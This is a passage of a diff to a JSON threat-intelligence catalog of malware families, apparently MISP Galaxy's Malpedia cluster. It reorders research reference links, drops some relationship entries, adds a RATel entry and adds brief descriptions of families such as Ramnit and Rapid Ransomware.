"https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
"https://www.sans.org/webcasts/contrarian-view-solarwinds-119515"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6c562458-7970-4d61-aded-1fe4a9002404",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "309f9be7-8824-4452-90b3-cef81fd10099",
"value": "Raindrop"
},
@@ -38020,10 +40080,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo",
- "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
"https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2017-02-15-the-rambo-backdoor.md",
- "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html"
+ "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf",
+ "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook"
],
"synonyms": [
"brebsd"
@@ -38046,34 +40106,34 @@
"value": "Ramdo"
},
{
- "description": "",
+ "description": "According to Check Point, Ramnit is primarily a banking trojan, meaning that its purpose is to steal login credentials for online banking, which cybercriminals can sell or use in future attacks. For this reason, Ramnit primarily targets individuals rather than focusing on particular industries.\r\n\r\nRamnit campaigns have been observed to target organizations in particular industries. For example, a 2019 campaign targeted financial organizations in the United Kingdom, Italy, and Canada.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
- "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://muha2xmad.github.io/unpacking/ramnit/",
- "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html",
- "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://www.youtube.com/watch?v=l6ZunH6YG0A",
"https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://research.checkpoint.com/ramnits-network-proxy-servers/",
- "https://artik.blue/malware4",
+ "https://www.youtube.com/watch?v=l6ZunH6YG0A",
"https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
+ "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
+ "https://artik.blue/malware4",
+ "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://muha2xmad.github.io/unpacking/ramnit/",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://research.checkpoint.com/ramnits-network-proxy-servers/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/",
+ "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
"http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://www.youtube.com/watch?v=N4f2e8Mygag",
- "http://www.secureworks.com/research/threat-profiles/gold-fairfax",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/"
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
+ "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "http://www.secureworks.com/research/threat-profiles/gold-fairfax"
],
"synonyms": [
"Nimnul"
@@ -38088,12 +40148,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://www.antiy.cn/research/notice&report/research_report/20200522.html",
- "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
"https://www.youtube.com/watch?v=SKIu4LqMrns",
"https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
- "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/"
+ "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/",
+ "https://www.antiy.cn/research/notice&report/research_report/20200522.html",
+ "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/"
],
"synonyms": [],
"type": []
@@ -38106,12 +40167,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus",
+ "https://bin.re/blog/the-dga-of-ranbyus/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/",
"http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html",
"https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/",
- "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/",
- "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
+ "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf",
+ "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/"
],
"synonyms": [],
"type": []
@@ -38163,34 +40225,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx",
- "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://github.com/Bleeping/Ransom.exx",
- "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://github.com/Bleeping/Ransom.exx",
"https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/",
"https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
"https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
"https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
"https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html",
"https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4"
+ "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx"
],
"synonyms": [
"Defray777",
@@ -38231,15 +40293,15 @@
"value": "SNC"
},
{
- "description": "",
+ "description": "InfinityGroup notes that Rapid Ransomware, unlike regular Ransomware, stays active on the computer after initially encrypting the systems and also encrypts any new files that are created. It does this by creating auto-runs that are designed to launch the ransomware and display the ransom note every time the infected system is started.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom",
- "https://twitter.com/malwrhunterteam/status/977275481765613569",
- "https://twitter.com/malwrhunterteam/status/997748495888076800",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
"https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do"
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://twitter.com/malwrhunterteam/status/977275481765613569",
+ "https://twitter.com/malwrhunterteam/status/997748495888076800"
],
"synonyms": [],
"type": []
@@ -38248,7 +40310,7 @@
"value": "Rapid Ransom"
},
{
- "description": "",
+ "description": "A spy trojan is a type of malware that has the capability to gather information from the infected system without consent from the user. This information is then sent to a remote attacker.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer",
@@ -38265,8 +40327,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog",
- "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/",
- "https://tracker.fumik0.com/malware/Rarog"
+ "https://tracker.fumik0.com/malware/Rarog",
+ "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/"
],
"synonyms": [],
"type": []
@@ -38275,7 +40337,7 @@
"value": "Rarog"
},
{
- "description": "",
+ "description": "This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar",
@@ -38292,12 +40354,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin",
- "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/",
- "https://redcanary.com/blog/raspberry-robin/",
- "https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks",
+ "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/",
+ "https://unit42.paloaltonetworks.com/unsigned-dlls/",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis",
+ "https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe",
+ "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html",
"https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://redcanary.com/blog/raspberry-robin/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/",
"https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices",
- "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm"
+ "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm",
+ "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/",
+ "https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks"
],
"synonyms": [
"LINK_MSIEXEC",
@@ -38306,15 +40376,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "70dc3e92-9b3b-4fc1-abd2-d98985d83225",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "34b3a45b-e522-4342-91c8-b6aad9817f99",
"value": "Raspberry Robin"
},
@@ -38323,31 +40384,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba",
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
+ "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
+ "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
- "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
- "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html",
"https://twitter.com/PhysicalDrive0/status/828915536268492800",
- "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
- "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
- "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0"
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
],
"synonyms": [
"QUICKRIDE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "64b3c66b-fc70-4b5a-83a9-866cde2ccb0b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0",
"value": "Ratankba"
},
@@ -38367,6 +40419,21 @@
"uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d",
"value": "RatankbaPOS"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://github.com/FrenchCisco/RATel"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "56ac6980-4db4-4bac-8f8a-cebf5ead6308",
+ "value": "RATel"
+ },
{
"description": "",
"meta": {
@@ -38387,8 +40454,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos",
"http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite",
- "https://www.youtube.com/watch?v=fevGZs0EQu8",
- "https://threatvector.cylance.com/en_us/home/rawpos-malware.html"
+ "https://threatvector.cylance.com/en_us/home/rawpos-malware.html",
+ "https://www.youtube.com/watch?v=fevGZs0EQu8"
],
"synonyms": [],
"type": []
@@ -38414,8 +40481,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm",
- "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf",
- "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal"
+ "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
],
"synonyms": [],
"type": []
@@ -38428,16 +40495,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
- "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/",
"https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/",
- "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
+ "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html",
"http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
+ "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
+ "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf",
+ "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf",
+ "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
"https://www.f-secure.com/documents/996508/1030745/callisto-group",
"https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware",
- "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf",
- "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html"
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/"
],
"synonyms": [
"Crisis",
@@ -38479,24 +40547,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf",
"https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/",
- "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf"
+ "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/"
],
"synonyms": [
"GREYSTUFF"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d357a6ff-00e5-4fcc-8b9e-4a9d98a736e7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "69798a1e-1caf-4bc8-b4af-6508d8a26717",
"value": "RDAT"
},
@@ -38505,9 +40564,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot",
- "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
"http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html",
+ "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
"https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under"
],
"synonyms": [],
@@ -38521,21 +40580,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver",
- "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html",
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/",
+ "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "826c31ca-2617-47e4-b236-205da3881182",
"value": "Reaver"
},
@@ -38544,11 +40594,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker",
- "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
- "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
"https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
+ "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/",
- "https://d01a.github.io/raccoon-stealer/"
+ "https://d01a.github.io/raccoon-stealer/",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
+ "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
+ "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/"
],
"synonyms": [],
"type": []
@@ -38574,37 +40631,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
- "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/",
- "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
- "http://blog.macnica.net/blog/2017/12/post-8c22.html",
- "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware",
- "https://www.jpcert.or.jp/magazine/acreport-redleaves.html",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
+ "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware",
+ "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/",
+ "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "https://www.jpcert.or.jp/magazine/acreport-redleaves.html",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
"https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
+ "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html"
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "http://blog.macnica.net/blog/2017/12/post-8c22.html"
],
"synonyms": [
"BUGJUICE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "179f7228-6fcf-4664-a084-57bd296d0cde",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a70e93a7-3578-47e1-9926-0818979ed866",
"value": "RedLeaves"
},
@@ -38613,73 +40661,92 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer",
- "https://muha2xmad.github.io/malware-analysis/fullredline/",
- "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html",
- "https://securityscorecard.pathfactory.com/all/a-detailed-analysis",
- "https://securityscorecard.com/research/detailed-analysis-redline-stealer",
